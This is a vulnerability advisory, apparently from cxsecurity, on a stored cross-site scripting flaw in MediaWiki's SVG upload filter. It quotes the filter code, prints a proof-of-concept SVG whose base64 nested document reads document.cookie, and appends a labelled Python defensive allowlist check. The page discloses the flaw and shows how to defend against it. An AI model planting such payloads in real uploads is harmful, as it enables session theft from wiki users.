MediaWiki 1.19.23 Stored XSS in SVG via embedded SVG

2015.04.13
Credit: csteipp
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

When uploading an SVG file, it is possible to bypass the validation filters and upload an SVG file that executes JavaScript when rendered. The SVG validation is a blacklist-based approach and contains protections against numerous techniques for embedding JavaScript in SVG files; however, the protections against nested SVG files are inadequate because the MIME type blacklist is incomplete. Specifically, data: URIs with the image/svg or text/xml formats are blacklisted, but the application/xml MIME type is sufficient to create a nested SVG file with JavaScript code.

# /includes/upload/UploadBase.php

# href with embedded svg as target
if ( $stripped == 'href' && preg_match( '!data:[^,]*image/svg[^,]*,!sim', $value ) ) {
    wfDebug( __METHOD__ . ": Found href to embedded svg "
        . "\"<$strippedElement '$attrib'='$value'...\" in uploaded file.\n" );
    return true;
}

# href with embedded (text/xml) svg as target
if ( $stripped == 'href' && preg_match( '!data:[^,]*text/xml[^,]*,!sim', $value ) ) {
    wfDebug( __METHOD__ . ": Found href to embedded svg "
        . "\"<$strippedElement '$attrib'='$value'...\" in uploaded file.\n" );
    return true;
}

Listing 1: Blacklist filtering for data: URIs with specific MIME types.

The following example SVG file contains a nested SVG file embedded within a data: URI. The nested SVG file contains executable JavaScript.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<use xlink:href="data:application/xml;base64,
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5r
PSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj4KPGRlZnM+CjxjaXJjbGUgaWQ9InRlc3QiIHI9I
jUwIiBjeD0iMTAwIiBjeT0iMTAwIiBzdHlsZT0iZmlsbDogI0YwMCI+CjxzZXQgYXR0cmlidXRlTm
FtZT0iZmlsbCIgYXR0cmlidXRlVHlwZT0iQ1NTIiBvbmJlZ2luPSdhbGVydChkb2N1bWVudC5jb29r
aWUpJwpvbmVuZD0nYWxlcnQoIm9uZW5kIiknIHRvPSIjMDBGIiBiZWdpbj0iMXMiIGR1cj0iNXMiIC
8+CjwvY2lyY2xlPgo8L2RlZnM+Cjx1c2UgeGxpbms6aHJlZj0iI3Rlc3QiLz4KPC9zdmc+#test"/>
</svg>

Listing 2: Specially crafted SVG file with a nested SVG file containing executable JavaScript code.

During testing, this exploit was only confirmed against the Firefox browser. Testing indicates that other browsers do not support nested SVG files.
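The gap described above is the blacklist itself: it enumerates two MIME strings and misses application/xml. The following is an added example, not code from the advisory or from MediaWiki, that ports the two quoted regexes to Python and contrasts them with an allowlist check that inspects every href / xlink:href data: URI in an uploaded SVG, rejecting anything that is not an allowlisted raster type or whose decoded body looks like markup. The RASTER_ALLOWLIST policy and the INNER / NESTED_XML_SVG sample (which carries no script) are constructed assumptions for the demonstration.

```python
import base64
import re
import xml.etree.ElementTree as ET

# The two href blacklist regexes quoted from UploadBase.php in the advisory, ported to Python.
LEGACY_BLACKLIST = [
    re.compile(r"data:[^,]*image/svg[^,]*,", re.I | re.S),
    re.compile(r"data:[^,]*text/xml[^,]*,", re.I | re.S),
]
# Hardened rule (assumed policy): a data: href may only carry an allowlisted raster image.
RASTER_ALLOWLIST = {"image/png", "image/jpeg", "image/gif"}
DATA_URI = re.compile(r"^\s*data:(?P<mime>[^;,]*)(?P<params>[^,]*),(?P<body>.*)$", re.I | re.S)

def legacy_rejects(href):
    """The advisory's blacklist: matches image/svg and text/xml, misses application/xml."""
    return any(p.search(href) for p in LEGACY_BLACKLIST)

def hardened_rejects(href):
    """Reject a data: href unless its declared type is an allowlisted raster type and
    its decoded body does not look like markup (also catches mislabeled nested XML)."""
    m = DATA_URI.match(href)
    if not m:
        return False  # ordinary link or '#fragment'; not this check's concern
    mime = m.group("mime").strip().lower() or "text/plain"  # RFC 2397 default type
    body = m.group("body").split("#", 1)[0]  # drop a trailing URI fragment such as '#test'
    if ";base64" in m.group("params").lower():
        try:
            body = base64.b64decode(re.sub(r"\s+", "", body), validate=True).decode("utf-8", "replace")
        except ValueError:
            return True  # undecodable payload: refuse rather than guess
    if mime not in RASTER_ALLOWLIST:
        return True
    return body.lstrip("\ufeff \t\r\n").startswith("<")

def rejected_hrefs(svg_text, rejects):
    """Every href / xlink:href value in the SVG that the given rule would reject."""
    return [v for el in ET.fromstring(svg_text).iter() for k, v in el.attrib.items()
            if k.rsplit("}", 1)[-1].lower() == "href" and rejects(v)]

# Constructed sample (no script in it): an outer SVG whose <use> pulls a nested SVG through
# data:application/xml, the MIME type the advisory says the blacklist does not cover.
INNER = b'<svg xmlns="http://www.w3.org/2000/svg"><circle id="t" r="5"/></svg>'
NESTED_XML_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<use xlink:href="data:application/xml;base64,%s#t"/></svg>' % base64.b64encode(INNER).decode()
)
```

Running `rejected_hrefs(NESTED_XML_SVG, legacy_rejects)` returns an empty list while `rejected_hrefs(NESTED_XML_SVG, hardened_rejects)` flags the nested document, which is the whole difference between the two approaches.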

References:

https://phabricator.wikimedia.org/T85850



Copyright 2024, cxsecurity.com
